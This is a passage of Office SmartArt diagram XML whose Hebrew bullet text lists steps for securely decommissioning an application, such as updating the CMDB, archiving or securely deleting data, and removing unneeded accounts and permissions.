          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>עדכנו את התיעוד, לרבות בבסיס הנתונים של בקרת השינויים (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>CMDB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>) וארכיטקטורת אבטחת המידע, הבקרות ופעולות ההפחתה, לרבות כל ה-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>runbooks</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> ותיעוד הפרויקט.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72F04728-EB7F-44E1-B2C8-A5F70468DC9B}" type="parTrans" cxnId="{58823A73-24FB-4B0A-9AA5-B4DDEAEEF4F8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{845F0D00-DD1B-43D9-B7BB-39606BA1FB57}" type="sibTrans" cxnId="{58823A73-24FB-4B0A-9AA5-B4DDEAEEF4F8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{22FE6A74-2EA3-4944-AFA6-4D9149A80287}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>כל מידע נדרש אמור לעבור לארכיון. כל ייתר המידע צריך להימחק בצורה מאובטחת.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{81EAEA15-68D0-4B0C-9CE5-BA4AA92E4E38}" type="parTrans" cxnId="{75F4D7C4-E2F9-493E-B322-F46104000860}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AB65CA6-3140-4DF3-91CB-3EA76E66E7D6}" type="sibTrans" cxnId="{75F4D7C4-E2F9-493E-B322-F46104000860}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1306ABE-EDDE-44FB-800B-96D1F379ABF8}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>גרעו יישומים בצורה מאובטחת, לרבות מחיקת חשבונות מיותרים, תפקידים והרשאות.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85DBFCD0-85C0-425B-A758-F7BC0AF70D8C}" type="parTrans" cxnId="{36C13452-CE3C-4232-8486-0A8158B4FD17}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{16A02BBA-6567-43CC-8A63-6C5F76B70AE1}" type="sibTrans" cxnId="{36C13452-CE3C-4232-8486-0A8158B4FD17}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1AF2EF51-C32F-45AD-94B7-87941BB9B270}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>הגדירו את היישום למצב "לא בשימוש" בבסיס הנתונים של בקרת השינויים (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>CMDB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="900" noProof="0" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3651B9B8-6F9D-4A10-BEE0-89AA5570FBDD}" type="parTrans" cxnId="{8A32622D-5808-4891-B13A-3CC4DC27F0AC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D6683D2E-72B8-4AF7-B69F-71D84B15A893}" type="sibTrans" cxnId="{8A32622D-5808-4891-B13A-3CC4DC27F0AC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" type="pres">
      <dgm:prSet presAssocID="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="6" custScaleX="45202" custScaleY="82622" custLinFactX="42667" custLinFactNeighborX="100000">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED648348-3383-4156-B7CD-1CB7092349F2}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="6" custScaleX="123722" custScaleY="90910" custLinFactNeighborX="-45077">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" type="pres">
      <dgm:prSet presAssocID="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="6" custScaleX="45202" custScaleY="98507" custLinFactX="42667" custLinFactNeighborX="100000">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29555282-7DBF-4954-82C2-561252AD070F}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="6" custScaleX="123722" custScaleY="110001" custLinFactNeighborX="-45077">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" type="pres">
      <dgm:prSet presAssocID="{D22B1E2D-9241-472F-8A9E-565E70887137}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="6" custScaleX="45202" custScaleY="98610" custLinFactX="42667" custLinFactNeighborX="100000">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="6" custScaleX="123722" custScaleY="102028" custLinFactNeighborX="-45077">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" type="pres">
      <dgm:prSet presAssocID="{35F82638-1CE8-4F68-915D-3475E1D94C1A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" type="pres">
      <dgm:prSet presAssocID="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}" type="pres">
      <dgm:prSet presAssocID="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="6" custScaleX="45202" custScaleY="120963" custLinFactX="42927" custLinFactNeighborX="100000">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{992D08B6-B207-435B-A893-D17B49418ACB}" type="pres">
      <dgm:prSet presAssocID="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="6" custScaleX="123722" custScaleY="144855" custLinFactNeighborX="-44862">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7F2930EF-2282-4737-B8ED-0133EE5AB8BC}" type="pres">
      <dgm:prSet presAssocID="{A1D63F8A-2B07-42DD-981B-5171E6B8B8C1}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" type="pres">
      <dgm:prSet presAssocID="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" type="pres">
      <dgm:prSet presAssocID="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="6" custScaleX="45202" custScaleY="101258" custLinFactX="42927" custLinFactNeighborX="100000">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" type="pres">
      <dgm:prSet presAssocID="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="6" custScaleX="123722" custScaleY="107152" custLinFactNeighborX="-44862">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78713489-5D47-416E-ADAE-302406F812AE}" type="pres">
      <dgm:prSet presAssocID="{3AEE799B-7F35-4AE2-93E2-335733E35922}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" type="pres">
      <dgm:prSet presAssocID="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{50CC931A-2802-4A28-B17D-4CFEC4144601}" type="pres">
      <dgm:prSet presAssocID="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" presName="parentText" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="6" custScaleX="45202" custScaleY="62093" custLinFactX="42667" custLinFactNeighborX="100000">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" type="pres">
      <dgm:prSet presAssocID="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="5" presStyleCnt="6" custScaleX="123722" custScaleY="62093" custLinFactNeighborX="-45077">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{B663EA81-9240-5F43-A148-92ACDFE7CC44}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B2D91BBE-1378-41FC-9264-F48A239FFB13}" type="presOf" srcId="{8D5E0A5A-E1D6-43E4-B810-AC84A8E4EE69}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F2F98BD2-1C60-4449-9786-E663C55ED06B}" type="presOf" srcId="{F538D215-0B96-4052-865C-D03A281B1284}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{051F9242-E1E2-2444-B3CE-725EAD7E4065}" type="presOf" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{449A6759-A677-4310-BF4B-F64DD3265850}" type="presOf" srcId="{BE0F412C-1F25-405D-9012-BD962314F66B}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5D4CC039-79CA-43C8-80BE-7DE8BDF97535}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{41228087-2C8A-42B2-95A5-6DC05A825928}" srcOrd="3" destOrd="0" parTransId="{9F0464B5-1719-4B9D-B467-B6E72A6B06B8}" sibTransId="{6BB77A12-2E7C-416D-B59F-77A0668E86F7}"/>
    <dgm:cxn modelId="{D171B653-7A5B-4379-816D-1D552EA72388}" type="presOf" srcId="{41228087-2C8A-42B2-95A5-6DC05A825928}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{09C32F7C-515B-404D-8AE3-B2490E7E364C}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{B01638C1-786F-496F-A0B5-C410B108826A}" srcOrd="1" destOrd="0" parTransId="{43694437-CD3E-4284-9D44-1593B764192C}" sibTransId="{2609C602-4F2A-4BD0-B793-B9A8F7528A0D}"/>
    <dgm:cxn modelId="{EDC09417-802C-4328-9EE0-403FD17D3C09}" type="presOf" srcId="{1AF2EF51-C32F-45AD-94B7-87941BB9B270}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{09CDA0D1-29B2-4EB5-B634-EBDFA51CC760}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{0786C881-DD5F-4C34-8E15-D85B8862AF8C}" srcOrd="0" destOrd="0" parTransId="{302B31FD-46E7-4A6F-8969-E535A47E5F7D}" sibTransId="{DE67E8EF-0263-45D4-8441-4818F5A7CC37}"/>
    <dgm:cxn modelId="{65EE5B13-93D8-43B4-8C8B-2CDC6B92FA69}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{E98F482C-ABEC-458F-9169-7E2DCBC80573}" srcOrd="4" destOrd="0" parTransId="{79CA7AB6-88B9-48D0-9CC6-7BC9B990BF70}" sibTransId="{71BD76A0-9CD4-4F82-AB21-32F91C00A719}"/>
    <dgm:cxn modelId="{A4BCFA15-B570-475E-8076-E0DF9219BD56}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" srcOrd="4" destOrd="0" parTransId="{F7BEB89D-4E4B-4D2E-BAF8-791B6EF09E28}" sibTransId="{3AEE799B-7F35-4AE2-93E2-335733E35922}"/>
    <dgm:cxn modelId="{6F606730-CF92-4BAD-B450-96CD97EFD0C2}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{1B2D3447-5350-4927-A312-D529CBC4E037}" srcOrd="3" destOrd="0" parTransId="{F53887AC-B941-4AAB-8FEA-FB9B951AF11A}" sibTransId="{1C442963-DBE0-4F04-BD90-C24B340C3F06}"/>
